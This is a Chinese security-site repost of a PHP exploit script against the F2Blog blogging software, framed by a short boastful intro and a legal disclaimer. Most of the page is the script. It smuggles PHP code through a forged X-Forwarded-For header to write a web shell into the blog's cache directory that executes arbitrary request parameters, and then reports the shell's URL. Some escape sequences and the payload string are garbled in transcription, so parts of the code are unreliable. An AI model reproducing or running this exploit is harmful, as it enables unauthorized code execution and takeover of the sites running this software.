Exploit For F2blog 's

admin
admin
admin
139293
文章
114
评论
2017年4月23日07:59:53评论281 views字数 1703阅读5分40秒阅读模式
摘要

来源:Loveshell
官方的人好牛啊,呵呵,硬要说程序没问题,服务器有问题,不鸟啦~~~~~
不过 后台做得实在很好

来源:Loveshell
官方的人好牛啊,呵呵,硬要说程序没问题,服务器有问题,不鸟啦~~~~~
不过 后台做得实在很好

Exp 拿来 YY一下,顺便说句,漏洞不只这一个挖

<?php
print_r("

+------------------------------------------------------------------+

Exploit For F2Blog All Version
BY Mokfly 媒婆X 拖鞋王子
Just For Fun :)

+------------------------------------------------------------------+
");

ini_set("max_execution_time",0);
error_reporting(7);

$blogpath="$argv[2]";
$server="$argv[1]";
$cookie='';

$shell= "http://".$server.$blogpath."cache/loveshell.php";

$evilcode="fputs(fopen('cache/loveshell.php','w+'),'<[email protected](/$_REQUEST[c])?>Orz')";
$evilcode="'));".$evilcode.";/*";
$evilip="X-Forwarded-For: ".$evilcode;

preg_match('/X-Powered-By: php//(.+)/r/n/ie',send(""),$php);
echo "We Got php version:/t".$php[1]."/r/n";

send("");

$evilip="";

send("");

if(@file_get_contents($shell)=='Orz')
{
echo "Expoilt Success!/t/r/n";
echo "View Your shell:/t$shell";
}
else die("Faild!/r/n");

function send($cmd)
{
global $blogpath,$server,$cookie,$count,$useragent,$debug,$evilip;

$path=$blogpath."index.php";
$message = "POST ".$path." HTTP/1.1/r/n";
$message .= "Accept: */*/r/n";
$message .= "Accept-Language: zh-cn/r/n";
$message .= "Referer: http://".$server.$path."/r/n";
$message .= "Content-Type: application/x-www-form-urlencoded/r/n";
$message .= "User-Agent: ".$useragent."/r/n";
$message .= "Host: ".$server."/r/n";
$message .= "Content-length: ".strlen($cmd)."/r/n";
$message .= "Connection: Keep-Alive/r/n";
$message .= "Cookie: ".$cookie."/r/n";
$message .= $evilip."/r/n";
$message .= "/r/n";
$message .= $cmd."/r/n";

echo $message;
$fd = fsockopen( $server, 80 );
fputs($fd,$message);
$resp = "<pre>";
while($fd&&!feof($fd)) {
$resp .= fread($fd,1024);
}
fclose($fd);
$resp .="</pre>";
if($debug) {echo $cmd;echo $resp;}
// echo $resp;
return $resp;
}
?>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月23日07:59:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Exploit For F2blog 'shttps://cn-sec.com/archives/49088.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息